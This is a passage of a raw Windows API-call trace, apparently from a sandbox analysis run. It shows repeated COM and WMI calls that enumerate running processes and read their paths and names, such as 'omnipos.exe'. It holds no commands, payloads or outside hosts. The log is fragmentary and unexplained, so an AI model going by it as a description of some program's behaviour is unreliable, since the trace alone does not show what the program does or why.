Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5635fa8) returned 0x0 [0214.754] IUnknown:QueryInterface (in: This=0x5635fa8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.754] IUnknown:QueryInterface (in: This=0x5635fa8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.754] IUnknown:AddRef (This=0x5635fa8) returned 0x3 [0214.754] IUnknown:QueryInterface (in: This=0x5635fa8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.754] IUnknown:QueryInterface (in: This=0x5635fa8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.754] IUnknown:QueryInterface (in: This=0x5635fa8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5635fac) returned 0x0 [0214.754] IMarshal:GetUnmarshalClass (in: This=0x5635fac, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.754] IUnknown:Release (This=0x5635fac) returned 0x3 [0214.754] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.755] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.755] IUnknown:QueryInterface (in: This=0x5635fa8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.755] IUnknown:Release (This=0x5635fa8) returned 0x2 [0214.755] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.755] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.755] IUnknown:QueryInterface (in: This=0x5635fa8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5635fa8) returned 0x0 [0214.755] IUnknown:AddRef (This=0x5635fa8) returned 0x4 [0214.755] IUnknown:Release (This=0x5635fa8) returned 0x3 [0214.755] IUnknown:Release (This=0x5635fa8) returned 0x2 [0214.755] CoTaskMemFree (pv=0x56322a8) [0214.755] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.755] IUnknown:AddRef (This=0x5635fa8) returned 0x3 [0214.755] IWbemClassObject:Get (in: This=0x5635fa8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.755] IWbemClassObject:Get (in: This=0x5635fa8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2732\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.756] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2732\"") returned 0x66 [0214.756] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2732\"") returned 0x66 [0214.756] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.756] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.756] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.756] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.757] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56322a8) returned 0x0 [0214.757] WbemDefPath:IUnknown:QueryInterface (in: This=0x56322a8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.757] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56322a8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x56380c0) returned 0x0 [0214.757] WbemDefPath:IUnknown:Release (This=0x56322a8) returned 0x0 [0214.757] WbemDefPath:IUnknown:QueryInterface (in: This=0x56380c0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x56380c0) returned 0x0 [0214.757] WbemDefPath:IUnknown:QueryInterface (in: This=0x56380c0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.757] WbemDefPath:IUnknown:AddRef (This=0x56380c0) returned 0x3 [0214.757] WbemDefPath:IUnknown:QueryInterface (in: This=0x56380c0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.757] WbemDefPath:IUnknown:QueryInterface (in: This=0x56380c0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.758] WbemDefPath:IUnknown:QueryInterface (in: This=0x56380c0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56322b8) returned 0x0 [0214.758] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56322b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.758] WbemDefPath:IUnknown:Release (This=0x56322b8) returned 0x3 [0214.758] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.758] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.758] WbemDefPath:IUnknown:QueryInterface (in: This=0x56380c0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.758] WbemDefPath:IUnknown:Release (This=0x56380c0) returned 0x2 [0214.758] WbemDefPath:IUnknown:Release (This=0x56380c0) returned 0x1 [0214.758] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.758] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.758] WbemDefPath:IUnknown:QueryInterface (in: This=0x56380c0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x56380c0) returned 0x0 [0214.758] WbemDefPath:IUnknown:AddRef (This=0x56380c0) returned 0x3 [0214.758] WbemDefPath:IUnknown:Release (This=0x56380c0) returned 0x2 [0214.758] WbemDefPath:IWbemPath:SetText (This=0x56380c0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2732\"") returned 0x0 [0214.758] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.758] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.758] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.758] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.758] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.758] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.758] IWbemClassObject:Get (in: This=0x5635fa8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269a944*=0, plFlavor=0x269a948*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="omnipos.exe", varVal2=0x0), pType=0x269a944*=8, plFlavor=0x269a948*=0) returned 0x0 [0214.758] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0214.758] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0214.759] IWbemClassObject:Get (in: This=0x5635fa8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269a944*=8, plFlavor=0x269a948*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="omnipos.exe", varVal2=0x0), pType=0x269a944*=8, plFlavor=0x269a948*=0) returned 0x0 [0214.759] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0214.759] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0214.759] CoTaskMemAlloc (cb=0x4) returned 0x56322e8 [0214.759] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56322e8, puReturned=0x267acc0 | out: apObjects=0x56322e8*=0x5636140, puReturned=0x267acc0*=0x1) returned 0x0 [0214.793] IUnknown:QueryInterface (in: This=0x5636140, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5636140) returned 0x0 [0214.793] IUnknown:QueryInterface (in: This=0x5636140, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.793] IUnknown:QueryInterface (in: This=0x5636140, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.794] IUnknown:AddRef (This=0x5636140) returned 0x3 [0214.794] IUnknown:QueryInterface (in: This=0x5636140, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.794] IUnknown:QueryInterface (in: This=0x5636140, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.794] IUnknown:QueryInterface (in: This=0x5636140, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5636144) returned 0x0 [0214.794] IMarshal:GetUnmarshalClass (in: This=0x5636144, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.794] IUnknown:Release (This=0x5636144) returned 0x3 [0214.794] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.794] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.794] IUnknown:QueryInterface (in: This=0x5636140, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.794] IUnknown:Release (This=0x5636140) returned 0x2 [0214.794] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.794] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.794] IUnknown:QueryInterface (in: This=0x5636140, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5636140) returned 0x0 [0214.794] IUnknown:AddRef (This=0x5636140) returned 0x4 [0214.794] IUnknown:Release (This=0x5636140) returned 0x3 [0214.794] IUnknown:Release (This=0x5636140) returned 0x2 [0214.794] CoTaskMemFree (pv=0x56322e8) [0214.795] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.795] IUnknown:AddRef (This=0x5636140) returned 0x3 [0214.795] IWbemClassObject:Get (in: This=0x5636140, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.795] IWbemClassObject:Get (in: This=0x5636140, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2760\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.795] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2760\"") returned 0x66 [0214.795] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2760\"") returned 0x66 [0214.795] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.795] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.795] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.795] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.796] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56322e8) returned 0x0 [0214.796] WbemDefPath:IUnknown:QueryInterface (in: This=0x56322e8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.796] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56322e8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x56381a0) returned 0x0 [0214.797] WbemDefPath:IUnknown:Release (This=0x56322e8) returned 0x0 [0214.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x56381a0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x56381a0) returned 0x0 [0214.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x56381a0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.797] WbemDefPath:IUnknown:AddRef (This=0x56381a0) returned 0x3 [0214.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x56381a0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x56381a0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x56381a0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56322f8) returned 0x0 [0214.797] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56322f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.797] WbemDefPath:IUnknown:Release (This=0x56322f8) returned 0x3 [0214.797] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.797] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x56381a0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.797] WbemDefPath:IUnknown:Release (This=0x56381a0) returned 0x2 [0214.797] WbemDefPath:IUnknown:Release (This=0x56381a0) returned 0x1 [0214.797] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.797] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x56381a0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x56381a0) returned 0x0 [0214.798] WbemDefPath:IUnknown:AddRef (This=0x56381a0) returned 0x3 [0214.798] WbemDefPath:IUnknown:Release (This=0x56381a0) returned 0x2 [0214.798] WbemDefPath:IWbemPath:SetText (This=0x56381a0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2760\"") returned 0x0 [0214.798] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.798] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.798] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.798] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.798] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.798] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.798] IWbemClassObject:Get (in: This=0x5636140, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269b1b0*=0, plFlavor=0x269b1b4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="mxslipstream.exe", varVal2=0x0), pType=0x269b1b0*=8, plFlavor=0x269b1b4*=0) returned 0x0 [0214.798] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0214.798] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0214.798] IWbemClassObject:Get (in: This=0x5636140, wszName="Name", lFlags=0, 